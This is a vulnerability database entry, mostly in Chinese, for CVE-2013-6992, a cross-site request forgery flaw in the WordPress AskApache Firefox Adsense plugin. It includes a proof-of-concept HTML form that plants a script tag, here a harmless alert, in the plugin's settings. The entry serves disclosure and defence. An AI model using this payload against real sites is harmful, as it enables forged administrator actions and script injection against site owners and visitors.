Lucene search

K
seebugRootSSV:61228
HistoryDec 27, 2013 - 12:00 a.m.

Wordpress AskApache Firefox Adsense插件跨站请求伪造漏洞

2013-12-2700:00:00
Root
www.seebug.org
17

0.004 Low

EPSS

Percentile

71.4%

CVE ID:CVE-2013-6992

WordPress是一款内容管理系统。

由于 "/wp-admin/options-general.php"脚本未充分验证HTTP请求源,远程攻击者可以欺骗管理员访问含有CSRF代码的恶意链接,在受影响网站的浏览器上下文中执行任意HTML和脚本代码。
0
Wordpress AskApache Firefox Adsense<=3.0
官方禁用易受攻击的插件。


                                                The exploitation example below injects JavaScript code, which uses the &quot;alert()&quot; function to display &quot;immuniweb&quot; word:


&lt;form action=&quot;http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aafireadcode&quot;  value='&lt;script&gt;alert(&quot;immuniweb&quot;);&lt;/script&gt;'&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;